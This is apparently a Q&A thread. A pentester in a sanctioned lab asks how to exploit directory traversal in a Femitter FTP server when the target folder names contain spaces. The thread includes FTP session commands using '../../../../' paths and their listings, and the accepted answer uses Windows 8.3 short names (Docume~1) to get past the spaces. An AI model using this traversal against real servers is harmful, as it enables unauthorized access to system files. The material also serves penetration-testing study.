FTP directory traversal attack on directories containing white spaces

15

4

I am conducting a sanctioned pentest in a closed reference environment, and stumbled upon a seemingly simple issue that I currently cannot solve.

When attempting to execute a directory traversal attack against a vulnerable Femitter FTP server running on MS Windows, it is possible to do a LIST on the system root (addresses and content listings changed here for reference only):

# ftp 192.168.13.22
Connected to 192.168.13.22.
220 Femitter FTP Server ready.
Name (192.168.13.22:root): 
331 Password required for root.
Password:
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx   1 ftp      ftp            0 Sep 23  2015 AUTOEXEC.BAT
-rw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 CONFIG.SYS
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 Documents and Settings
dr--r--r--   1 ftp      ftp            0 Sep 23  2015 Program Files
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 WINDOWS
226 File sent ok

However, if I want to list the contents of a folder containing white spaces, such as Documents and Settings, I am not able to list the directory contents because the white spaces are ignored.

ftp> ls ../../../../documents and settings/
usage: ls remote-directory local-file
ftp> ls ../../../../documents\ and\ settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls ../../../../documents%20and%20settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents%20and%20settings not found
226 File sent ok
ftp> ls ../../../../'documents and settings'/
usage: ls remote-directory local-file
ftp> ls ../../../../"documents and settings"/
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls "../../../../documents and settings/"
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok

I have already tried using different FTP clients (CLI and GUI, on Linux and Windows), and either they ignore white spaces or disallow directory traversal.

I also tried scripting the attack in Python, using at first raw sockets and then ftplib to send the commands in hex format directly to the FTP server, but with no success.

Googling for a couple of hours did not yield a working solution (yes, there were a lot of options, which did not work), which is why I hope there is someone here who has had the same issue. Pretty sure that this is not the first time such a directory traversal with white spaces is needed.

lockout

Posted 2016-02-23T17:56:24.713

Reputation: 411

Case sensitivity looks to be irrelevant for the FTP clients. At least the GNU/Linux FTP client lists directories ignoring the letter case. – None – 2016-02-23T18:38:34.280

@lockout: case sensitivity is a server side thing and not a client thing. The client lists the data the same way the server sends it and does not change the case. – Steffen Ullrich – 2016-02-23T18:46:01.450

@Steffen Ullrich: Thanks! This server is not case sensitive. And case sensitivity actually is not an issue here, but the white spaces, which terminate the directory traversal, are. – None – 2016-02-23T18:50:52.130

@tim: thanks! The FTP server banner, as seen in the listing, is Femitter FTP server, and not the native Windows FTP service. It could be, but I doubt it, that this issue is limited to this server edition only. – None – 2016-02-23T18:54:32.693

Also give C:\Docume~1\ a try. – Dog eat cat world – 2016-02-23T22:15:19.527

Try escaping the spaces with \ or quoting the directory string – DavidPostill – 2016-02-23T22:34:21.250

@Dog eat cat world: Whoa, you are right about that notation! I had forgotten about that one. Will give that one a try now, and report back. – lockout – 2016-02-24T07:25:19.893

@DavidPostill: Thanks! The option you mentioned, besides some more white-space escape approaches, was already tried initially. You can see that in the listing above. – lockout – 2016-02-24T07:33:19.740

@Dogeatcatworld: Your suggestion worked! The Windows folder short notation C:\Docume~1\ had dropped out from my head completely! I will update the post with the solution. Could you please submit your answer also so that I can mark that one as a working solution? Thanks again – lockout – 2016-02-24T07:36:58.100

Hold your horses guys! :) I am a total newcomer to this forum, and I will post the solution promptly. I just thought it would be better if the user who suggested the working solution added it, to get proper credit. Everyone calm down... thanks! – lockout – 2016-02-24T07:55:10.310

I am happy it worked for you @lockout. Since you have gone through the trouble of answering your question, it is fine by me that you accept it as the answer. Thanks for crediting me. – Dog eat cat world – 2016-02-24T11:24:07.603

Answers

16

Solution suggested by @Dogeatcatworld: use the MS Windows directory short notation, such as C:\Docume~1\.

ftp> ls ../../../../Docume~1/
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 .
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 ..
drw-rw-rw-   1 ftp      ftp            0 Sep 26  2015 Administrateur
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 All Users
226 File sent ok

A really good article from the MS Knowledge Base explains the 8.3 directory notation: How Windows Generates 8.3 File Names from Long File Names

lockout

Posted 2016-02-23T17:56:24.713

Reputation: 411

OSCP, I see. To add to your tip: for short directories, such as "All Users", drop the space and use "AllUse~1".

Did you find a way to mount the FTP share to browse interactively, or did you just end up downloading files one by one? – n00b – 2018-01-02T19:33:50.503

1

The "short name" is really the old DOS 8.3 naming convention, so all the directories will be the first 6 letters followed by ~1, assuming there is only one name that matches, for example:

C:\ABCDEF~1 - C:\ABCDEFG I AM DIRECTORY
C:\BCDEFG~1 - C:\BCDEFGHIJKL M Another Directory

Here is the only exception:

C:\ABCDEF~1 - C:\ABCDEFG I AM DIRECTORY
C:\ABCDEF~2 - C:\ABCDEFGHI Directory as well

Source: How can I find the short path of a Windows directory/file?

madsport

Posted 2016-02-23T17:56:24.713

Reputation: 11
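As an added illustration (not code from the question or either answer), here is a small Python model of the 8.3 short-name rule that the accepted answer and madsport's answer describe: spaces dropped, upper-cased, first six characters kept, then ~1, ~2, ... on collision. The legal-character set and the "already 8.3-valid" check are simplified assumptions of this example, and real NTFS switches to a hash-based form after several collisions, which is not modelled here.

```python
import re

# Characters allowed in an 8.3 name; anything else becomes "_".
# Simplified assumption for this example, not a byte-exact NTFS rule set.
_LEGAL = re.compile(r"[A-Z0-9$%'\-_@~`!(){}^#&]")


def _clean(part: str) -> str:
    """Upper-case, drop spaces and embedded periods, replace illegal chars."""
    part = part.replace(" ", "").replace(".", "").upper()
    return "".join(c if _LEGAL.match(c) else "_" for c in part)


def short_name(long_name: str, taken: set) -> str:
    """Return the 8.3 alias Windows would generate for long_name inside a
    directory whose already-assigned short names are in `taken` (updated)."""
    stem = long_name.lstrip(".")           # leading periods are ignored
    name, dot, ext = stem.rpartition(".")
    if not dot:
        name, ext = stem, ""
    base, ext3 = _clean(name), _clean(ext)[:3]
    # A name that is already 8.3-valid (case-insensitively) gets no alias.
    if (stem == long_name and base == name.upper() and 0 < len(base) <= 8
            and ext3 == ext.upper()):
        alias = base if not ext3 else f"{base}.{ext3}"
        taken.add(alias)
        return alias
    n = 1
    while True:                            # ABCDEF~1, ABCDEF~2, ... ABCDE~10
        tail = f"~{n}"
        alias = base[:8 - len(tail)] + tail
        if ext3:
            alias += "." + ext3
        if alias not in taken:
            taken.add(alias)
            return alias
        n += 1


def short_names(listing):
    """Map every long name in a directory listing to its 8.3 alias, numbering
    ~1, ~2, ... in listing order (the order Windows saw the names created)."""
    taken = set()
    return {name: short_name(name, taken) for name in listing}


if __name__ == "__main__":
    # Constructed sample: the root listing shown in the question.
    for long, short in short_names(["AUTOEXEC.BAT", "CONFIG.SYS",
                                    "Documents and Settings", "Program Files",
                                    "WINDOWS"]).items():
        print(f"{short:14} <- {long}")
```

Short-name generation can be disabled per NTFS volume (the NtfsDisable8dot3NameCreation registry value), which removes these aliases as an alternate spelling of a path, although aliases created earlier remain until they are stripped.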

0

FTP doesn't use URL encoding, so %xx won't work unless you're using FTP in a browser that can translate it for you.

Try using quotes around it instead, i.e.: ls "../../some dir"

wireghoul

Posted 2016-02-23T17:56:24.713

Reputation: 116

Hi, if you look at the attempts tried for directory traversal, you will see I attempted multiple quotes: single quote, double quote, and backtick. They did not work, as represented in the FTP output listing. Using %20 was just to experiment with whether that would work, out of desperate attempts to try all options. Of course % encoding works on browsers and FTP clients able to interpret them. – lockout – 2016-02-24T10:33:46.120